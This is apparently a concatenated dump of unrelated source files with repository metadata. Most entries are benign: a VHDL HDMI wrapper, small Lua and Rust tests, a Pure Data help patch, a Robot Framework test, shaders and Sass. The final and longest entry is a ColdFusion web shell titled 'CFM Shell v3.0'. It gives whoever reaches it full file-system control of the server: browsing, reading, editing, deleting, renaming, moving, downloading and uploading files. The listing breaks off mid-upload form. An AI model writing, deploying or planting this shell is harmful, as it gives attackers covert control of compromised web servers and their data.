library IEEE; use IEEE.STD_LOGIC_1164.ALL; USE ieee.std_logic_arith.all; USE ieee.std_logic_unsigned.all; entity hdmi_acr_ctrl is port ( -- AXI4-Lite bus (cpu control) axi_aclk : in std_logic; axi_aresetn : in std_logic; -- - Write address axi_awvalid : in std_logic; axi_awready : out std_logic; axi_awaddr : in std_logic_vector(31 downto 0); -- - Write data axi_wvalid : in std_logic; axi_wready : out std_logic; axi_wdata : in std_logic_vector(31 downto 0); axi_wstrb : in std_logic_vector(3 downto 0); -- - Write response axi_bvalid : out std_logic; axi_bready : in std_logic; axi_bresp : out std_logic_vector(1 downto 0); -- - Read address axi_arvalid : in std_logic; axi_arready : out std_logic; axi_araddr : in std_logic_vector(31 downto 0); -- - Read data/response axi_rvalid : out std_logic; axi_rready : in std_logic; axi_rdata : out std_logic_vector(31 downto 0); axi_rresp : out std_logic_vector(1 downto 0); -- Audio clock (512 * Fs) aud_clk : in std_logic; -- HDMI TMDS clock hdmi_clk : in std_logic; -- Audio PLL Lock pll_lock_in : in std_logic; -- Audio reset out aud_resetn_out : out std_logic; -- Audio Clock Regeneration values aud_acr_valid_in : in std_logic; aud_acr_cts_in : in std_logic_vector(19 downto 0); aud_acr_n_in : in std_logic_vector(19 downto 0); aud_acr_valid_out: out std_logic; aud_acr_cts_out : out std_logic_vector(19 downto 0); aud_acr_n_out : out std_logic_vector(19 downto 0) ); end hdmi_acr_ctrl; architecture rtl of hdmi_acr_ctrl is ATTRIBUTE X_INTERFACE_INFO : STRING; ATTRIBUTE X_INTERFACE_PARAMETER : STRING; ATTRIBUTE X_INTERFACE_INFO OF axi_aclk: SIGNAL IS "xilinx.com:signal:clock:1.0 axi_aclk CLK"; ATTRIBUTE X_INTERFACE_PARAMETER OF axi_aclk: SIGNAL IS "ASSOCIATED_BUSIF axi, ASSOCIATED_RESET axi_aresetn"; ATTRIBUTE X_INTERFACE_INFO OF axi_aresetn: SIGNAL IS "xilinx.com:signal:reset:1.0 axi_aresetn RST"; ATTRIBUTE X_INTERFACE_PARAMETER OF axi_aresetn: SIGNAL IS "POLARITY ACTIVE_LOW"; component hdmi_acr_ctrl_top port ( -- AXI4-Lite bus (cpu control) axi_aclk : in std_logic; axi_aresetn : in std_logic; -- - Write address axi_awvalid : in std_logic; axi_awready : out std_logic; axi_awaddr : in std_logic_vector(31 downto 0); -- - Write data axi_wvalid : in std_logic; axi_wready : out std_logic; axi_wdata : in std_logic_vector(31 downto 0); axi_wstrb : in std_logic_vector(3 downto 0); -- - Write response axi_bvalid : out std_logic; axi_bready : in std_logic; axi_bresp : out std_logic_vector(1 downto 0); -- - Read address axi_arvalid : in std_logic; axi_arready : out std_logic; axi_araddr : in std_logic_vector(31 downto 0); -- - Read data/response axi_rvalid : out std_logic; axi_rready : in std_logic; axi_rdata : out std_logic_vector(31 downto 0); axi_rresp : out std_logic_vector(1 downto 0); -- Audio clock (512 * Fs) aud_clk : in std_logic; -- HDMI TMDS clock hdmi_clk : in std_logic; -- Audio PLL Lock pll_lock_in : in std_logic; -- Audio reset out aud_resetn_out : out std_logic; -- Audio Clock Regeneration values aud_acr_valid_in : in std_logic; aud_acr_cts_in : in std_logic_vector(19 downto 0); aud_acr_n_in : in std_logic_vector(19 downto 0); aud_acr_valid_out: out std_logic; aud_acr_cts_out : out std_logic_vector(19 downto 0); aud_acr_n_out : out std_logic_vector(19 downto 0) ); end component; begin hdmi_acr_ctrl_top_inst : hdmi_acr_ctrl_top port map ( -- AXI4-Lite bus (cpu control) axi_aclk => axi_aclk , axi_aresetn => axi_aresetn, -- Write address axi_awvalid => axi_awvalid, axi_awready => axi_awready, axi_awaddr => axi_awaddr , -- Write data axi_wvalid => axi_wvalid , axi_wready => axi_wready , axi_wdata => axi_wdata , axi_wstrb => axi_wstrb , -- Write response axi_bvalid => axi_bvalid , axi_bready => axi_bready , axi_bresp => axi_bresp , -- Read address axi_arvalid => axi_arvalid, axi_arready => axi_arready, axi_araddr => axi_araddr , -- Read data/response axi_rvalid => axi_rvalid , axi_rready => axi_rready , axi_rdata => axi_rdata , axi_rresp => axi_rresp , -- Audio clock (512 * Fs) aud_clk => aud_clk, -- HDMI TMDS clock hdmi_clk => hdmi_clk, -- Audio PLL Lock pll_lock_in => pll_lock_in, -- Audio reset out aud_resetn_out => aud_resetn_out, -- Audio Clock Regeneration values aud_acr_valid_in => aud_acr_valid_in, aud_acr_cts_in => aud_acr_cts_in, aud_acr_n_in => aud_acr_n_in, aud_acr_valid_out => aud_acr_valid_out, aud_acr_cts_out => aud_acr_cts_out, aud_acr_n_out => aud_acr_n_out ); end rtl;
VHDL
4
hito0512/Vitis-AI
Whole-App-Acceleration/apps/resnet50/build_flow/DPUCVDX8G_vck190/vck190_platform/hw/source/ip/hdmi_acr_ctrl/hdmi_acr_ctrl.vhd
[ "Apache-2.0" ]
table.insert(_G.test_loadorder, "FANCY after")
Lua
1
uga-rosa/neovim
test/functional/fixtures/pack/foo/start/fancyplugin/after/filen.lua
[ "Vim" ]
struct S<T = u8>(T); trait Tr<T = u8> {} impl Self for S {} //~ ERROR expected trait, found self type `Self` impl Self::N for S {} //~ ERROR cannot find trait `N` in `Self` fn main() {}
Rust
2
Eric-Arellano/rust
src/test/ui/resolve/resolve-self-in-impl-2.rs
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
#N canvas 564 81 875 580 12; #X declare -stdpath ./; #N canvas 0 0 450 300 (subpatch) 0; #X array sample 155944 float 0; #X coords 0 1 155943 -1 250 200 1 0 0; #X restore 572 262 graph; #X floatatom 63 437 0 0 0 0 - - - 0; #X text 148 139 "set" message permits you to switch between arrays ; #X text 174 291 creation argument initializes array name; #X obj 53 542 tabwrite~; #X obj 196 542 tabread; #X obj 255 542 tabwrite; #X obj 90 26 tabplay~; #X obj 552 161 soundfiler; #X floatatom 552 187 0 0 0 0 - - - 0; #X obj 63 411 env~ 16384; #X obj 322 542 soundfiler; #X obj 124 542 tabread4~; #X msg 90 214 0 44100; #X msg 84 189 44100; #X msg 77 165 bang; #X text 62 67 The tabplay~ object plays a sample \, or part of one \, with no transposition or interpolation. It is cheaper than tabread4~ and there are none of tabread4~'s interpolation artifacts.; #X text 111 166 "bang" or 0 plays whole sample; #X text 131 188 play starting at 44100th sample; #X text 148 212 play starting at beginning for 44100 samples; #X msg 95 239 44100 1000; #X text 173 238 play from 44100 through 45099 (1000 samples); #X text 647 540 updated for Pd version 0.43; #X msg 102 264 stop; #X text 138 265 stop playing (outputs zeros when stopped); #X obj 165 338 bng 15 250 50 0 empty empty empty 17 7 0 10 #fcfcfc #000000 #000000; #X text 183 337 <= bang when finished playing the table; #X text 157 27 - play a table as a sample (non-transposing); #X obj 63 291 tabplay~ sample; #X msg 63 139 set sample; #X obj 258 480 ../2.control.examples/15.array; #X obj 258 503 ../2.control.examples/16.more.arrays; #X text 56 514 see also:, f 10; #X obj 81 336 output~; #X obj 680 24 declare -stdpath ./; #X msg 552 129 read -resize ../sound/bell.aiff sample; #X text 619 99 load table; #X obj 552 99 loadbang; #X text 192 434 Check also the "array" examples from the Pd tutorial by clicking and opening the files below, f 43; #N canvas 978 194 593 443 Dealing_with_"\$0" 0; #X text 36 33 '\$0' - the patch ID number used to force locality in Pd - is widely used in send/receive names as well as array names. This is specially useful in abstractions so each copy has local names instead of global., f 70; #X text 438 284 <= array with local name, f 13; #X obj 306 283 array define \$0-x; #X obj 227 300 f \$0; #X obj 62 290 output~; #X msg 100 205 set \$1; #X obj 100 179 symbol \$0-x; #X obj 100 156 bng 15 250 50 0 empty empty empty 17 7 0 10 #fcfcfc #000000 #000000; #X text 227 197 You can also load '\$0' in a float object and send it to a message that works like a send to send messages to an array. , f 40; #X text 119 153 click to set name; #X obj 227 361 soundfiler; #X floatatom 227 387 0 0 0 0 - - - 0; #X msg 227 329 read -resize ../sound/bell.aiff \$1-x; #X obj 227 274 loadbang; #X obj 62 240 tabplay~; #X obj 62 189 bng 15 250 50 0 empty empty empty 17 7 0 10 #fcfcfc #000000 #000000; #X text 36 86 You can use "\$0" in an array name and if you need to set the array name you can load it in a symbol object \, since "\$0" doesn't work in messages., f 70; #X connect 3 0 12 0; #X connect 5 0 14 0; #X connect 6 0 5 0; #X connect 7 0 6 0; #X connect 10 0 11 0; #X connect 12 0 10 0; #X connect 13 0 3 0; #X connect 14 0 4 0; #X connect 14 0 4 1; #X connect 15 0 14 0; #X restore 359 383 pd Dealing_with_"\$0"; #X text 197 374 open subpatch to see how to deal with '\$0', f 21 ; #X obj 407 542 array; #X connect 8 0 9 0; #X connect 10 0 1 0; #X connect 13 0 28 0; #X connect 14 0 28 0; #X connect 15 0 28 0; #X connect 20 0 28 0; #X connect 23 0 28 0; #X connect 28 0 10 0; #X connect 28 0 33 0; #X connect 28 0 33 1; #X connect 28 1 25 0; #X connect 29 0 28 0; #X connect 35 0 8 0; #X connect 37 0 35 0;
Pure Data
4
myQwil/pure-data
doc/5.reference/tabplay~-help.pd
[ "TCL" ]
if (global != window) { throw new Error("global is not equal to window"); } console.log(process); console.log(Buffer); console.log(setImmediate); console.log(clearImmediate);
TypeScript
2
petamoriken/deno
cli/tests/testdata/compat/globals.ts
[ "MIT" ]
# Copyright Project Harbor Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License *** Settings *** Documentation This resource provides any keywords related to the Harbor private registry appliance Resource ../../resources/Util.robot *** Keywords *** Go Into Artifact [Arguments] ${tag} Retry Wait Until Page Not Contains Element ${artifact_list_spinner} Retry Element Click xpath=//clr-dg-row[contains(.,'${tag}')]//a[contains(.,'sha256')] Retry Wait Until Page Contains Element ${artifact_tag_component} Retry Wait Until Page Not Contains Element ${artifact_list_spinner} Should Contain Tag [Arguments] ${tag} Retry Wait Until Page Contains Element xpath=//artifact-tag//clr-dg-row//clr-dg-cell[contains(.,'${tag}')] Should Not Contain Tag [Arguments] ${tag} Retry Wait Until Page Not Contains Element xpath=//artifact-tag//clr-dg-row//clr-dg-cell[contains(.,'${tag}')] Add A New Tag [Arguments] ${tag} Retry Double Keywords When Error Retry Element Click ${add_tag_button} Retry Wait Element ${tag_name_xpath} Retry Text Input ${tag_name_xpath} ${tag} Retry Double Keywords When Error Retry Element Click ${add_ok_button} Should Contain Tag ${tag} Delete A Tag [Arguments] ${tag} Retry Element Click xpath=//clr-dg-row[contains(.,'${tag}')]//div[contains(@class,'clr-checkbox-wrapper')]//label[contains(@class,'clr-control-label')] Retry Double Keywords When Error Retry Element Click ${delete_tag_button} Retry Wait Until Page Contains Element ${dialog_delete_button} Retry Double Keywords When Error Retry Element Click ${dialog_delete_button} Should Not Contain Tag ${tag} Should Contain Artifact Retry Wait Until Page Contains Element xpath=//artifact-list-tab//clr-dg-row//a[contains(.,'sha256')] Should Not Contain Any Artifact Retry Wait Until Page Not Contains Element xpath=//artifact-list-tab//clr-dg-row
RobotFramework
4
kschu91/harbor
tests/resources/Harbor-Pages/Project-Artifact.robot
[ "Apache-2.0" ]
Hello! (template strings)
HTML
3
jpmallarino/django
tests/template_loader/template_strings/template_loader/hello.html
[ "BSD-3-Clause", "0BSD" ]
LANGSPEC:logtalk.spc KEYWORDS:logtalk.key
Logtalk
3
jfmc/logtalk3
coding/crimson/extension.logtalk
[ "Apache-2.0" ]
class ColumnText < Column attr_reader :header, :data_proc def init(config) @header = config[:header] @text = config[:text] return self end def data_proc Proc.new do |row, value| @text end\ end end
Opal
3
bcavileer/digest-rails
app/assets/javascripts/digest-rails/opal_lib/column_text.js.opal
[ "MIT" ]
// run-pass pub fn main() { let command = "a"; match command { "foo" => println!("foo"), _ => println!("{}", command), } }
Rust
4
Eric-Arellano/rust
src/test/ui/issues/issue-22008.rs
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
<script long_long_attribute="long_long_long_long_long_long_long_long_long_long_long_value"> alert(1)</script> <style long_long_attribute="long_long_long_long_long_long_long_long_long_long_long_value"> .a{color: #f00}</style> <script> alert(1)</script> <style> .a{color: #f00}</style>
HTML
1
szynkowskij/prettier
tests/format/html/bracket-same-line/embed.html
[ "MIT" ]
<a n:href='Presenter:foo'>Test</a>
Latte
0
timfel/netbeans
php/php.latte/test/unit/data/testfiles/lexer/top/n-href-single.latte
[ "Apache-2.0" ]
static float4 gl_Position; static float4 vA; static float4 vB; static float4 vC; struct SPIRV_Cross_Input { float4 vA : TEXCOORD0; float4 vB : TEXCOORD1; float4 vC : TEXCOORD2; }; struct SPIRV_Cross_Output { float4 gl_Position : SV_Position; }; void vert_main() { precise float4 _15 = vA * vB; precise float4 _19 = vA + vB; precise float4 _23 = vA - vB; precise float4 _30 = _15 + vC; precise float4 _34 = _15 + _19; precise float4 _36 = _34 + _23; precise float4 _38 = _36 + _30; gl_Position = _38; } SPIRV_Cross_Output main(SPIRV_Cross_Input stage_input) { vA = stage_input.vA; vB = stage_input.vB; vC = stage_input.vC; vert_main(); SPIRV_Cross_Output stage_output; stage_output.gl_Position = gl_Position; return stage_output; }
GLSL
3
N500/filament
third_party/spirv-cross/reference/opt/shaders-hlsl/vert/no-contraction.vert
[ "Apache-2.0" ]
// Source: https://github.com/twbs/bootstrap/blob/master/scss/mixins/_screen-reader.scss .d-sr-only, .d-sr-only-focusable:not(:focus) border: 0 !important clip: rect(0, 0, 0, 0) !important height: 1px !important margin: -1px !important // Fix for https://github.com/twbs/bootstrap/issues/25686 overflow: hidden !important padding: 0 !important position: absolute !important white-space: nowrap !important width: 1px !important
Sass
3
ahmadiqbal1/vuetify
packages/vuetify/src/styles/utilities/_screenreaders.sass
[ "MIT" ]
' Licensed to the .NET Foundation under one or more agreements. ' The .NET Foundation licenses this file to you under the MIT license. ' See the LICENSE file in the project root for more information. Imports System.Globalization Imports System.Runtime.InteropServices Namespace Microsoft.CodeAnalysis.VisualBasic.Symbols Friend Enum GeneratedNameKind None = 0 HoistedMeField HoistedSynthesizedLocalField HoistedUserVariableField IteratorCurrentField IteratorInitialThreadIdField IteratorParameterProxyField StateMachineAwaiterField StateMachineStateField StateMachineHoistedUserVariableField StaticLocalField TransparentIdentifier AnonymousTransparentIdentifier AnonymousType LambdaCacheField LambdaDisplayClass End Enum End Namespace
Visual Basic
4
frandesc/roslyn
src/Compilers/VisualBasic/Portable/Symbols/SynthesizedSymbols/GeneratedNameKind.vb
[ "MIT" ]
-- Copyright 2021 Jeff Foley. All rights reserved. -- Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file. name = "UKWebArchive" type = "archive" function start() set_rate_limit(3) end function vertical(ctx, domain) scrape(ctx, {['url']=build_url(domain)}) end function build_url(domain) return "https://www.webarchive.org.uk/wayback/archive/cdx?matchType=domain&output=json&url=" .. domain end
Ada
4
Elon143/Amass
resources/scripts/archive/ukwebarchive.ads
[ "Apache-2.0" ]
<html> <style type="text/css"> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: #df5 !important; } span{ font-weight: bolder; } h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{text-decoration: none;} a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <head> <TITLE>CFM SHELL V3.0 edition</TITLE> <meta http-equiv="Content-Type" content="text/html"> </head> <body> <center> Cfm Shell v3.0 edition </center> <hr> <script langauge="JavaScript" type="text/javascript"> function doMenu(item) { obj=document.getElementById(item); col=document.getElementById("x" + item); if (obj.style.display=="none") { obj.style.display="block"; col.innerHTML="[-]"; } else { obj.style.display="none"; col.innerHTML="[+]"; } } </script> <!--- Login ---> <cfif IsDefined("logout")> <cfset structclear(cookie)> <cflocation url="?" addtoken="No"> </cfif> <cfif IsDefined("cookie.username")> <!--- Main ---> <center>Username:<font color="#FFFF33"><b><cfoutput>#username#</cfoutput></b></font> !</center> <center><b><a href="?logout">Logout</a></b></center> <hr> <cfoutput> <cfset dir = #GetDirectoryFromPath(GetTemplatePath())#> <cfif Right(dir, 1) neq "\" > <cfset dir = "#dir#\"> </cfif> <!--- Ham get Datasource Infor <cfscript> factory = CreateObject("java", "coldfusion.server.ServiceFactory"); DataSoureceInfo = factory.DataSourceService.getDatasources(); </cfscript> ---> <!--- Ham doc tep ---> <cffunction name="ReadFile" access="remote" output="true" returntype="any"> <cfargument name="fileread" type="string" required="true"/> <cffile action="read" file="#arguments.fileread#" variable="line"> <cfoutput>#line#</cfoutput> </cffunction> <!--- ham xoa thu muc ---> <cffunction name="dirDelete" access="public" output="false" returntype="any"> <cfargument name="dir" required="no" default="#expandPath('/pocket_cache/')#"> <cfdirectory action="list" name="delfile" directory="#arguments.dir#"> <cfif delfile.RecordCount EQ 0> <cfif directoryExists(arguments.dir)> <cfdirectory action="delete" directory="#arguments.dir#"> </cfif> <cfelse> <cfloop query="delfile"> <cfif type EQ "file"> <cffile action="delete" file="#arguments.dir#\#name#"> <cfelse> <cfset temp = dirDelete(arguments.dir & '\' & #delfile.name#)> </cfif> </cfloop> <cfif directoryExists(arguments.dir)> <cfdirectory action="delete" directory="#arguments.dir#"> </cfif> </cfif> </cffunction> <!--- ham doi ten thu muc ---> <cffunction name="renameDirectory" access="remote" output="false" returntype="void"> <cfargument name="oldDir" type="string" required="true"/> <cfargument name="newDir" type="string" required="true"/> <cfdirectory action="rename" directory="#arguments.oldDir#" newdirectory="#arguments.newDir#"/> </cffunction> </cfoutput> <!--- bat dau nhan lenh ---> <cfif isDefined("action")> <cfif action is "goto"> <cfoutput> <cfif isDefined("scr")> <cfset dir = #scr#> <cfif Right(dir, 1) neq "\" > <cfset dir = "#dir#\"> </cfif> </cfif> </cfoutput> <cfelseif action is "edit"> <cfoutput> <cfif isDefined("scr")> <cfif FileExists("#scr#")> <cfset file_name=#Replace(#scr#,'#GetDirectoryFromPath(scr)#','','ALL')#> <title>&##272;ang s&##7917;a t&##7879;p #scr#</title> <script language="JavaScript" type="text/javascript"> function sTrim(sVariable) { return sVariable.replace(/^\s+|\s+$/g,""); } function validateFields(form) { return true; } </script> <cffile action="read" file="#scr#" variable="thisFile"> <h1>Edit file:</h1> <div class=content> <form action="?action=save&scr=#GetDirectoryFromPath(scr)#" method="post" onsubmit="return validateFields(this);"> <input type="hidden" name="fileName" value="#file_name#" /> <input type="hidden" name="action_type" value="edit" /> <tr> <td style="font-weight:bold;" nowrap="nowrap"> File path: </td> <td> #scr# </td> </tr> <tr> <td> <cfset thisFile=#Replace(#thisFile#,'<','<','ALL')#> <cfset thisFile=#Replace(#thisFile#,'>','>','ALL')#> <textarea class="bigarea" name="fileContent">#thisFile#</textarea> </td> </tr> <tr> <td> <input type="submit" value="Save" style="font-family:verdana; font-size:11px;" /> </td> </tr> </form></div> <cfelse> <p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p> </cfif> <a href="?action=goto&scr=#GetDirectoryFromPath(scr)#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a> <cfelse> <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a> </cfif> </cfoutput> <cfelseif action is "cut"> <cfoutput> <cfif isDefined("scr")> <cfset cutdir = #scr#> <cfif FileExists("#scr#")> <cfset cutdir = #RemoveChars(cutdir, len(cutdir), 1)#> <cfloop condition = "Right(cutdir, 1) neq '\'"> <cfset cutdir = #RemoveChars(cutdir, len(cutdir), 1)#> </cfloop> <cfform name="articles" ENCTYPE="multipart/form-data"> B&##7841;n s&##7869; di chuy&##7875;n t&##7879;p <font color="red">#scr#</font> t&##7899;i <cfinput type="text" name="thumucsechuyen" size="50" value="#cutdir#"> <input type="submit" value="Th&##7921;c hi&##7879;n" /> </cfform> <cfif isDefined("thumucsechuyen")> <cffile action="move" source="#scr#" destination="#thumucsechuyen#"> <cflocation url="?action=goto&scr=#cutdir#" addtoken="No"> </cfif> <cfelse> <p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p> </cfif> <a href="?action=goto&scr=#cutdir#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a> <cfelse> <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a> </cfif> </cfoutput> <cfelseif action is "copy"> <cfoutput> <cfif isDefined("scr")> <cfset copydir = #scr#> <cfif FileExists("#scr#")> <cfset copydir = #RemoveChars(copydir, len(copydir), 1)#> <cfloop condition = "Right(copydir, 1) neq '\'"> <cfset copydir = #RemoveChars(copydir, len(copydir), 1)#> </cfloop> <cfform name="articles" ENCTYPE="multipart/form-data"> B&##7841;n s&##7869; sao ch&##233;p t&##7879;p <font color="red">#scr#</font> t&##7899;i <cfinput type="text" name="thumucsechuyen" size="50" value="#copydir#"> <input type="submit" value="Th&##7921;c hi&##7879;n" /> </cfform> <cfif isDefined("thumucsechuyen")> <cffile action="copy" source="#scr#" destination="#thumucsechuyen#"> <cflocation url="?action=goto&scr=#copydir#" addtoken="No"> </cfif> <cfelse> <p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p> </cfif> <a href="?action=goto&scr=#copydir#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a> <cfelse> <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a> </cfif> </cfoutput> <cfelseif action is "rename"> <cfoutput> <cfif isDefined("scr")> <cfset renamedir = #scr#> <cfif FileExists("#scr#")> <cfloop condition = "Right(renamedir, 1) neq '\'"> <cfset renamedir = #RemoveChars(renamedir, len(renamedir), 1)#> </cfloop> <cfform name="articles" ENCTYPE="multipart/form-data"> Rename #renamedir#<cfinput type="text" name="namechange" size="25" value=""> <input type="submit" value="Rename" /> </cfform> <cfif isDefined("namechange")> <cffile action="rename" source="#scr#" destination="#renamedir##namechange#"> <cflocation url="?action=goto&scr=#renamedir#" addtoken="No"> </cfif> <cfelse> <p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p> </cfif> <a href="?action=goto&scr=#renamedir#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a> <cfelse> <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a> </cfif> </cfoutput> <cfelseif action is "renamed"> <cfoutput> <cfif isDefined("scr")> <cfset renamedir = #scr#> <cfset renamedir = #RemoveChars(renamedir, len(renamedir), 1)#> <cfif DirectoryExists("#scr#")> <cfloop condition = "Right(renamedir, 1) neq '\'"> <cfset renamedir = #RemoveChars(renamedir, len(renamedir), 1)#> </cfloop> <cfform name="articles" ENCTYPE="multipart/form-data"> Rename #renamedir#<cfinput type="text" name="namechange" size="25" value=""> <input type="submit" value="Rename" /> </cfform> <cfif isDefined("namechange")> #renameDirectory('#scr#','#renamedir##namechange#')# <cflocation url="?action=goto&scr=#renamedir#" addtoken="No"> </cfif> <cfelse> <p>Th&##432; m&##7909;c #scr# kh&##244;ng t&##7891;n t&##7841;i.</p> </cfif> <a href="?action=goto&scr=#renamedir#" style="color: rgb(255, 0, 0);"><u> <- ..</u></a> <cfelse> <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- ..</u></a> </cfif> </cfoutput> <cfelseif action is "down"> <cfoutput> <cfif isDefined("scr")> <cfset downdir = #scr#> <cfif FileExists("#scr#")> <cfloop condition = "Right(downdir, 1) neq '\'"> <cfset downdir = #RemoveChars(downdir, len(downdir), 1)#> </cfloop> <cfheader name="Content-Disposition" value="attachment; filename=#getFileFromPath (scr)#"> <cfcontent file="#scr#" type="application/octet-stream"> <cfelse> <p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p> </cfif> <a href="?action=goto&scr=#downdir#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a> <cfelse> <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a> </cfif> </cfoutput> <cfelseif action is "del"> <cfoutput> <cfif isDefined("scr")> <cfset deletedir = #scr#> <cfset deletedir = #RemoveChars(deletedir, len(deletedir), 1)#> <cfif FileExists("#scr#")> <cfloop condition = "Right(deletedir, 1) neq '\'"> <cfset deletedir = #RemoveChars(deletedir, len(deletedir), 1)#> </cfloop> <cffile action="delete" file="#scr#"> <cflocation url="?action=goto&scr=#deletedir#" addtoken="No"> <cfelse> <p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p> </cfif> <a href="?action=goto&scr=#deletedir#" style="color: rgb(255, 0, 0);"><u> <- DeleteDir</u></a> <cfelse> <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- DeleteDir</u></a> </cfif> </cfoutput> <cfelseif action is "deld"> <cfoutput> <cfif isDefined("scr")> <cfset deletedir = #scr#> <cfset deletedir = #RemoveChars(deletedir, len(deletedir), 1)#> <cfif DirectoryExists("#scr#")> <cfloop condition = "Right(deletedir, 1) neq '\'"> <cfset deletedir = #RemoveChars(deletedir, len(deletedir), 1)#> </cfloop> <cfset dirDelete('#scr#')> <cflocation url="?action=goto&scr=#deletedir#" addtoken="No"> <cfelse> <p>DeleteDir</p> </cfif> <a href="?action=goto&scr=#deletedir#" style="color: rgb(255, 0, 0);"><u> <- DeleteDir</u></a> <cfelse> <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- DeleteDir</u></a> </cfif> </cfoutput> <cfelseif action is "new"> <!--- <cfoutput> <cfif isDefined("scr")> <cfif FileExists("#scr#")> <p>T&##7853;p tin #scr# &##273;&##227; t&##7891;n t&##7841;i.</p> <cfelse> <cfform name="articles" ENCTYPE="multipart/form-data"> B&##7841;n s&##7869; t&##7841;o th&##432; m&##7909;c m&##7899;i #scr#<cfinput type="text" name="namecreate" size="25" value=""> <input type="submit" value="Th&##7921;c hi&##7879;n" /> </cfform> <cfif isDefined("namecreate")> <cffile action = "write" file = "#scr##namecreate#" output = ""> <cflocation url="?action=goto&scr=#scr#" addtoken="No"> </cfif> </cfif> <a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a> <cfelse> <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a> </cfif> </cfoutput> ---> <cfoutput> <cfif isDefined("scr")> <cfdirectory action="list" directory="#scr#" name="fileList"> <script language="JavaScript" type="text/javascript"> var fileArray = new Array(<cfoutput>#quotedValueList(fileList.name)#</cfoutput>); function sTrim(sVariable) { return sVariable.replace(/^\s+|\s+$/g,""); } function validateFields(form) { var fileCount = 0; var re = /.txt$|.cfm$|.cfml$|.htm|.html$/; if (sTrim(form.fileName.value) == "") { alert('Can nhap ten tep'); form.fileName.focus(); return false; } if (form.fileName.value.search(re) < 0) { alert('Khong chap nhan tep loai nay!\n\n Chi chap nhan .cfm, .cfml, .htm, .html, va .txt!'); form.fileName.focus(); form.fileName.select(); return false; } for (var i=0; i<fileArray.length; i++) { if (sTrim(form.fileName.value) == fileArray[i]) { fileCount++; } } if (fileCount > 0) { alert('Ten nay da ton tai, vui long chon tep khac'); form.fileName.focus(); form.fileName.select(); return false; } return true; } </script> <form action="?action=save&scr=#scr#" method="post" onsubmit="return validateFields(this);"> <input type="hidden" name="action_type" value="add" /> <table border="0" style="width:400px;"> <tr> <td style="font-weight:bold;" nowrap="nowrap"> File name: </td> <td> <input type="text" name="fileName" style="font-family:verdana; font-size:11px; width:316px;" /> </td> </tr> <tr> <td style="font-weight:bold;" nowrap="nowrap"> File content: </td> <td colspan="2"> <textarea name="fileContent" style="font-family:verdana; font-size:11px; height:250px; width:600px;"></textarea> </td> </tr> <tr> <td colspan="2" style="text-align:right;"> <input type="submit" value="Save" style="font-family:verdana; font-size:11px;" /> </td> </tr> </table> </form> <a href="?action=goto&scr=#GetDirectoryFromPath(scr)#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a> <cfelse> <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a> </cfif> </cfoutput> <cfelseif action is "newd"> <cfoutput> <cfif isDefined("scr")> <cfform name="articles" ENCTYPE="multipart/form-data"> New dir: <cfinput type="text" name="namecreate" size="25" value="#GetDirectoryFromPath(scr)#"> <input type="submit" value="Create new dir" /> </cfform> <cfif isDefined("namecreate")> <cfdirectory directory= "#scr##namecreate#" action="create"> <cflocation url="?action=goto&scr=#scr#" addtoken="No"> </cfif> <a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a> <cfelse> <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a> </cfif> </cfoutput> <cfelseif action is "upload"> <cfoutput> <cfif isDefined("scr")> <cfform enctype="multipart/form-data" method="post"> Upload file to path: <font color="red">#scr#</font><br> Choose file: <input type="file" size="80" name="fileup" /> <input type="submit" value="Upload" /><br/> </cfform> <cfif isDefined("fileup")> <cffile action="upload" fileField="fileup" destination="#scr#" nameconflict="overwrite"> <cflocation url="?action=goto&scr=#scr#" addtoken="No"> </cfif> <a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 